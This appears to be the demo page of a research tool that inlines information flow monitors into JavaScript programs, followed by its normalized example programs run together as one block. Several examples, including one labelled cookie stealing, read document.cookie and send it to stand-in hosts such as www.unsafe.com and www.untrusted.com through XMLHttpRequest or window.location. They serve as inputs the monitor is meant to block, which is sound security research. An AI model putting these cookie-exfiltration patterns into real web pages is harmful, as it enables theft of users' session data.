Infomation Flow Monitor Inlining for JavaScript and Web APIs

Article: Modular Monitor Extensions for Information Flow Security in JavaScript
Full version can be found in Chapter 6 and Appendix C of Fragoso Santos Phd thesis
Proofs: Modular Monitor Extensions for Information Flow Security in JavaScript
IFlow Signatures for DOM APIs
Extra IFlow Signatures
Source Code
Instructions on how to use the tool

Input:

//Enter here your JavaScript input program. If the program is not normalized, it must be normalized before being compiled. All examples in the menu are already normalized. (Normalization is formally defined in the full version of the paper.)
Randomize Compile Save Normalize LOAD IFLOW_SIG
Support Coercions: Support APIs: Support Eval:

Output:

//Output Program: if the program triggers an information flow, its execution is blocked and the background becomes red
Run

Exec IFrame

Specify the CSS StyleSheet to Use with your Example:

Load StyleSheet

Examples:

• DOM Illegal Append - 1
• DOM Append with Upgrade - 1
• DOM Append with Upgrade - 2
• DOM Illegal Append - 2
• DOM Illegal Remove - 1
• DOM Illegal Remove - 2
• DOM Remove with Upgrade - 1
• DOM Illegal Append - 3
• DOM Append with Upgrade - 3
• Live Collections - Illegal Append - 1
• Live Collections - Illegal Append - 2
• Live Collections - Illegal Append - 3
• Live Collections - Append with Upgrade - 1
• Live Collections - Illegal Append - 4
• Live Collections - Append with Upgrade - 2
• Simple explicit flow
• Simple implicit flow
• Property upgrade
• Implicit flow
• Dynamic property creation
• Structure upgrade
• Eval
• Implicit flow with eval
• XMLHTTPRequest flow
• XMLHTTPRequest flow
• XMLHTTPRequest flow
• alert
• confirm and toString
• confirm and toString
• confirm and toString
• Tampering with native functions
• Useless tampering with native functions
• New object
• Implicit flow
• Prototype lookup
• Function call
• Implicit flow
• Aliasing
• Cookie stealing
• Coercions are handled
• For in: Safe
• For in: Safe
• For in: Reject

var div1, div2, div3, h, l; h = 1; upgVar(h, '2'); div1 = document.createElement('div'); div2 = document.createElement('div'); div3 = document.createElement('div'); div1.appendChild(div2); if (h) { div3.appendChild(div2); } l = div1.childNodes.length; var div1, div2, div3, h, l; h = 1; upgVar(h, '2'); div1 = document.createElement('div'); div2 = document.createElement('div'); div3 = document.createElement('div'); div1.appendChild(div2); upgStruct(div1, '2'); upgStruct(div3, '2'); div2.upgTreeLevel('2'); if (h) { div3.appendChild(div2); } l = div1.childNodes.length; var div1, div2, div3, h, l; h = 1; upgVar(h, '2'); div1 = document.createElement('div'); div2 = document.createElement('div'); div3 = document.createElement('div'); div1.appendChild(div2); upgStruct(div1, '2'); upgStruct(div3, '2'); div2.upgTreeLevel('2'); if (h) { div3.appendChild(div2); } l = div1.childNodes.length; alert(l); var div1, div2, div3, h, l; h = 1; upgVar(h, '2'); div1 = document.createElement("div"); div2 = document.createElement("div"); div3 = document.createElement("div"); div3.appendChild(div2); if (h) { div1.appendChild(div2); } div1.appendChild(div3); l = div1.childNodes[0]; var div1, div2, div3, h, l; h = 1; upgVar(h, '2'); div1 = document.createElement("div"); div2 = document.createElement("div"); div1.appendChild(div2); if (h) { div1.removeChild(div2); } l = div1.childNodes[0]; var div1, div2, h, l; h = confirm("Do you want to execute the if-then branch?"); div1 = document.createElement("DIV"); div2 = document.createElement("DIV"); div1.appendChild(div2); if (h) { div1.removeChild(div2); } l = div1.childNodes.length; alert(l); var div1, div2, h, l; h = confirm('Do you want to execute the if-then branch?'); div1 = document.createElement('DIV'); div2 = document.createElement('DIV'); div1.appendChild(div2); upgStruct(div1, '5'); div2.upgTreeLevel('5'); if (h) { div1.removeChild(div2); } l = div1.childNodes.length; var div1, div2, div3, h, l; h = confirm("Do you want to execute the if-then branch?"); div1 = document.createElement("DIV"); div2 = document.createElement("DIV"); div3 = document.createElement("DIV"); div3.appendChild(div2); if (h) { div1.appendChild(div2); } div1.appendChild(div3); l = div1.childNodes[0]; alert(l); var div1, div2, div3, h, l; h = confirm('Do you want to execute the if-then branch?'); div1 = document.createElement('DIV'); div2 = document.createElement('DIV'); div3 = document.createElement('DIV'); div3.appendChild(div2); upgStruct(div1, '5'); upgStruct(div3, '5'); div2.upgTreeLevel('5'); if (h) { div1.appendChild(div2); } div1.appendChild(div3); l = div1.childNodes[0]; var div1, div2, div3, divs, h, l; h = 1; upgVar(h, '2'); div1 = document.createElement("DIV"); div2 = document.createElement("DIV"); div3 = document.createElement("DIV"); div2.appendChild(div3); document.body.appendChild(div1); document.body.appendChild(div2); divs = document.getElementsByTagName("DIV"); if (h) { div2.appendChild(div1); } l = divs[0]; var div1, div2, div3, divs, h, l; h = 1; upgVar(h, '2'); div1 = document.createElement("DIV"); div2 = document.createElement("DIV"); div3 = document.createElement("DIV"); div2.appendChild(div3); document.body.appendChild(div1); document.body.appendChild(div2); divs = document.getElementsByTagName("DIV"); upgStruct(div1, '2'); upgStruct(div2, '2'); upgStruct(document.body, '2'); div2.upgTreeLevel('2'); div1.upgTreeLevel('2'); if (h) { div2.appendChild(div1); } l = divs[1]; var div, divs, h, l; h = confirm("Do you want to execute the if-then branch?"); divs = document.getElementsByTagName("DIV"); if (h) { div = document.createElement("DIV"); document.body.appendChild(div); } l = divs.length; alert(l); var body, div, divs, h, l; h = confirm('Do you want to execute the if-then branch?'); body = document.body; divs = document.getElementsByTagName('DIV'); upgStruct(body, '5'); upgGlobalTagLevel('DIV', '5'); upgVar(div, '5'); if (h) { div = document.createElement('DIV'); document.body.appendChild(div); } l = divs.length; var div1, div2, div3, divs, h, l; h = confirm("Do you want to execute the if-then branch?"); div1 = document.createElement("DIV"); div2 = document.createElement("DIV"); document.body.appendChild(div1); document.body.appendChild(div2); divs = document.getElementsByTagName("DIV"); if (h) { div3 = document.createElement("DIV"); div1.appendChild(div3); } l = divs[1]; var div1, div2, div3, divs, h, l, body; body = document.body; h = confirm('Do you want to execute the if-then branch?'); div1 = document.createElement('DIV'); div2 = document.createElement('DIV'); body.appendChild(div1); body.appendChild(div2); divs = document.getElementsByTagName('DIV'); upgStruct(body, '5'); upgStruct(div1, '5'); upgGlobalTagLevel('DIV', '5'); upgVar(div3, '5'); div2.upgTreeLevel('5'); if (h) { div3 = document.createElement('DIV'); div1.appendChild(div3); } l = divs[1]; var x, y; x = 4; upgVar(x, '2'); y = x + 4; var x, y; y = 3; upgVar(y, '2'); if (y) { x = 2; } var x, y, z; y = 3; upgVar(y, '2'); z = {}; z['p'] = null; upgProp(z, 'p', '2'); if (y) { z['p'] = 2; } var x, y, z; y = 3; upgVar(y, '2'); z = {}; z['p'] = null; if (y) { z['p'] = 2; } var o, h; o = {}; h = 3; upgVar(h, '2'); if(h) { o['p'] = 2; } var o, h; o = {}; h = 3; upgVar(h, '2'); upgStruct(o, '2'); if(h) { o['p'] = 2; } var x; eval('x = 3; x') var x, y; x = 0; y = 2; upgVar(y, '2'); if (y) { eval('x = 3; x'); } var xhr, cookie, url; var xhr, cookie, url; document.cookie = ''; upgProp(document, 'cookie', '2'); xhr = new XMLHttpRequest(); cookie = document.cookie; url = 'www.unsafe.com?' + cookie; xhr.open('POST', cookie); xhr.send(); var xhr, cookie, url; xhr = new XMLHttpRequest(); cookie = document.cookie; url = 'www.unsafe.com?' + cookie; xhr.open('POST', cookie); xhr.send(); var xhr, cookie, url; document.cookie = 'hello'; upgProp(document, 'cookie', '2'); xhr = new XMLHttpRequest(); cookie = document.cookie; url = 'www.safe.com?' + cookie; xhr.open('POST', cookie); xhr.send(); var n, o; n = 10; o = {}; while(n) { o[n] = n; n = n - 1; alert(n); } var o1, o2, public1, public2, secret, tmp; o1 = {}; o2 = {}; secret = confirm('Do you have a secret?'); tmp = function () { return 'p'; }; o1.toString = tmp; o2.p = secret; public1 = o2[o1]; if (public1) { public2 = 3; } var o1, o2, public1, public2, secret, f; o1 = {}; o2 = {}; secret = confirm('Do you have a secret?'); f = function () { return 'p'; }; o1.toString = f; o2.p = secret; public1 = o2[o1.toString()]; upgVar(public2, '5'); if (public1) { public2 = 3; } var o, f, h; o = {}; o.p = 0; upgStruct(o, '2'); f = function () { return false; }; o.hasOwnProperty = f; h = 1; upgVar(h, '2'); if (h) { o.p = 1; } var o, f_aux, h; var o, f, h; o = {}; upgStruct(o, '2'); f = function () { return false; }; o.hasOwnProperty = f; h = 1; upgVar(h, '2'); if (h) { o.p = 1; } var o, f_aux, h; o = {}; upgStruct(o, '2'); f_aux = function () { return false; }; o['hasOwnProperty'] = f_aux; h = 1; upgVar(h, '2'); if (h) { o['p'] = 1; } var Person, p1, low; Person = function (id, name, age) { this.id = id; this.name = name; this.age = age; upgProp(this, 'id', '2'); }; p1 = new Person(1, 'Raquel', 22); low = p1.id; var Person, p1, high, low, high; Person = function (id, name, age) { this.id = id; this.name = name; this.age = age; upgProp(this, 'id', '2'); }; p1 = new Person(1, 'Raquel', 22); high = p1.id; if (high) { low = high + 4; } var Person, person_proto, low, high, p1; Person = function (id, name, age) { this.id = id; this.name = name; this.age = age; upgProp(this, 'id', '2'); }; person_proto = Person.prototype; person_proto.secret = 'secret'; upgProp(person_proto, 'secret', '2'); p1 = new Person(1, 'Raquel', 22); high = p1.secret; if (high) { low = high + ' other secret'; } var Person, person_proto, fun_say_id, new_person, high; Person = function (name, id) { this.name = name; this.id = id; upgProp(this, 'id', '2'); }; person_proto = Person.prototype; fun_say_id = function () { return this.id; }; person_proto.sayYourId = fun_say_id; new_person = new Person('raquel', 1); high = new_person.sayYourId(); var Person, person_proto, fun_say_id, new_person, high, low; Person = function (name, id) { this.name = name; this.id = id; upgProp(this, 'id', '2'); }; person_proto = Person.prototype; fun_say_id = function () { return this.id; }; person_proto.sayYourId = fun_say_id; new_person = new Person('raquel', 1); high = new_person.sayYourId(); if (high) { low = high * 2; } var x, y, h, z1, z2; h = 0; upgVar(h, '2'); x = {}; x.f = 0; y = x; y.f = h; z1 = y.f; alert(z1); z2 = x.f; alert(z2); var cookie, url; document.cookie = ''; upgProp(document, 'cookie', '2'); cookie = document.cookie; url = 'http://www.untrusted.com/' + cookie; window.location = url; var h, l, o, aux; h = 1; l = false; o = {}; aux = function(){ var aux; if(h) { aux = {}; return aux; } else { return 1; } } o['valueOf'] = aux; aux = function(){ l = true; return 5; } o['toString'] = aux; o+1; var l, p, o; o = {}; o.q = 'foo'; o.p = 'bar'; l = ''; upgProp(o, 'p', '2'); for (p in o) { l = l + p; } alert(l); var l, p, o; o = {}; o.q = 'foo'; o.p = 'bar'; l = ''; upgProp(o, 'p', '2'); for (p in o) { l = l + p; } var l, p, o, s; o = {}; o.q = 'foo'; o.p = 'bar'; l = ''; upgProp(o, 'p', '2'); for (p in o) { s = o.p; alert(s); }